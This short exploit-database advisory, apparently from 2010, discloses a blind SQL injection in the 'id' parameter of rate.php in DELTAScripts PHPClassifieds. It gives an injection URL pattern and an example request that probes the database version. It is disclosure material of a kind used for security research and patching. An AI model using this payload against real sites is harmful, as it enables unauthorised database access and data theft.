DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection
| EDB-ID: 11071 | CVE: N/A | OSVDB-ID: N/A |
| Author: Hamza 'MizoZ' N. | Published: 2010-01-08 | Verified:  |
Exploit Code:  | Vulnerable App: N/A |
Rating |
| EDB-ID: 11071 | CVE: N/A | OSVDB-ID: N/A |
| Author: Hamza 'MizoZ' N. | Published: 2010-01-08 | Verified: |
| Exploit Code: | Vulnerable App: N/A |
Rating |
/* Name : DELTAScripts PHPClassifieds Vuln : Blind SQL Injection Author : Hamza 'MizoZ' N. Email : mizozx[at]gmail[dot]com WebSite : www.greymen.org<http://www.greymen.org> Greetz : Zuka, all friends & arab hackers */ Vulnerability is in the rate.php , $_GET['id'] [HOST]/[PATH]/rate.php?id=[true value]+[INJECTION] exemples : http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--